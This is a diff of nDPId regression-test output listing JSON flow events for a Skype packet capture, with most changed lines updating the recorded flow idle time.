-00595{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":216,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970684583,"flow_last_seen":1431970702158,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":417,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.146","src_port":51280,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00652{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":217,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970684583,"flow_last_seen":1431970702162,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":382,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.156","src_port":51281,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00595{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":217,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970684583,"flow_last_seen":1431970702162,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":382,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.156","src_port":51281,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00652{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970677603,"flow_last_seen":1431970694432,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":522,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.152","src_port":51274,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00595{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970677603,"flow_last_seen":1431970694432,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":522,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.152","src_port":51274,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00652{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":216,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970684583,"flow_last_seen":1431970702158,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":417,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.146","src_port":51280,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00595{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":216,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970684583,"flow_last_seen":1431970702158,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":417,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.146","src_port":51280,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00652{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":217,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970684583,"flow_last_seen":1431970702162,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":382,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.156","src_port":51281,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00595{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":217,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970684583,"flow_last_seen":1431970702162,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":382,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.156","src_port":51281,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431970635433,"flow_last_seen":1431970635489,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":63661,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"}} -00653{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431970668515,"flow_last_seen":1431970693321,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":567,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.176","src_port":51262,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00596{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431970668515,"flow_last_seen":1431970693321,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":567,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.176","src_port":51262,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00653{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970675578,"flow_last_seen":1431970692134,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":417,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.175","src_port":51271,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00596{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970675578,"flow_last_seen":1431970692134,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":417,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.175","src_port":51271,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00611{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431970649777,"flow_last_seen":1431970678255,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":78,"flow_tot_l4_payload_len":193,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.45","src_port":51236,"dst_port":40008,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00595{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431970649777,"flow_last_seen":1431970678255,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":78,"flow_tot_l4_payload_len":193,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.45","src_port":51236,"dst_port":40008,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00653{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431970668515,"flow_last_seen":1431970693321,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":567,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.176","src_port":51262,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00596{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431970668515,"flow_last_seen":1431970693321,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":567,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.176","src_port":51262,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00653{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970675578,"flow_last_seen":1431970692134,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":417,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.175","src_port":51271,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00596{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970675578,"flow_last_seen":1431970692134,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":417,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.175","src_port":51271,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00611{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431970649777,"flow_last_seen":1431970678255,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":78,"flow_tot_l4_payload_len":193,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.45","src_port":51236,"dst_port":40008,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00595{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431970649777,"flow_last_seen":1431970678255,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":78,"flow_tot_l4_payload_len":193,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.45","src_port":51236,"dst_port":40008,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970643669,"flow_last_seen":1431970643669,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1431970642412,"flow_last_seen":1431970643680,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":229,"flow_tot_l4_payload_len":806,"flow_avg_l4_payload_len":100,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.34","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1431970642408,"flow_last_seen":1431970643670,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":386,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} @@ -1064,36 +1064,36 @@ 00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431970643964,"flow_last_seen":1431970644121,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip6","src_ip":"fe80::c62c:3ff:fe06:49fe","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}} 00650{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":174,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970672329,"flow_last_seen":1431970672329,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.219","dst_ip":"233.89.188.1","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} 00707{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":232,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970687262,"flow_last_seen":1431970687262,"flow_idle_time":180000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"189.138.161.88","src_port":13021,"dst_port":19521,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} -00613{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431970666902,"flow_last_seen":1431970694879,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":77,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.142","src_port":51256,"dst_port":40013,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00597{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431970666902,"flow_last_seen":1431970694879,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":77,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.142","src_port":51256,"dst_port":40013,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00613{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431970666902,"flow_last_seen":1431970694879,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":77,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.142","src_port":51256,"dst_port":40013,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00597{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431970666902,"flow_last_seen":1431970694879,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":77,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.142","src_port":51256,"dst_port":40013,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431970634730,"flow_last_seen":1431970661287,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":57592,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00613{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431970657867,"flow_last_seen":1431970685617,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":92,"flow_tot_l4_payload_len":220,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.175","src_port":51248,"dst_port":40030,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00597{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431970657867,"flow_last_seen":1431970685617,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":92,"flow_tot_l4_payload_len":220,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.175","src_port":51248,"dst_port":40030,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00653{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":210,"flow_state":"finished","flow_packets_processed":199,"flow_first_seen":1431970682971,"flow_last_seen":1431970705724,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":77329,"flow_avg_l4_payload_len":388,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.48","src_port":51279,"dst_port":40008,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Unknown","breed":"Unrated"}} -00612{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":170,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970671951,"flow_last_seen":1431970689889,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":98,"flow_tot_l4_payload_len":231,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.18","src_port":51267,"dst_port":40025,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00596{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":170,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970671951,"flow_last_seen":1431970689889,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":98,"flow_tot_l4_payload_len":231,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.18","src_port":51267,"dst_port":40025,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00613{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431970657867,"flow_last_seen":1431970685617,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":92,"flow_tot_l4_payload_len":220,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.175","src_port":51248,"dst_port":40030,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00597{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431970657867,"flow_last_seen":1431970685617,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":92,"flow_tot_l4_payload_len":220,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.175","src_port":51248,"dst_port":40030,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00653{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":210,"flow_state":"finished","flow_packets_processed":199,"flow_first_seen":1431970682971,"flow_last_seen":1431970705724,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":77329,"flow_avg_l4_payload_len":388,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.48","src_port":51279,"dst_port":40008,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Unknown","breed":"Unrated"}} +00612{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":170,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970671951,"flow_last_seen":1431970689889,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":98,"flow_tot_l4_payload_len":231,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.18","src_port":51267,"dst_port":40025,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00596{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":170,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970671951,"flow_last_seen":1431970689889,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":98,"flow_tot_l4_payload_len":231,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.18","src_port":51267,"dst_port":40025,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00844{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":237,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970688025,"flow_last_seen":1431970688025,"flow_idle_time":180000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.14","src_port":13021,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 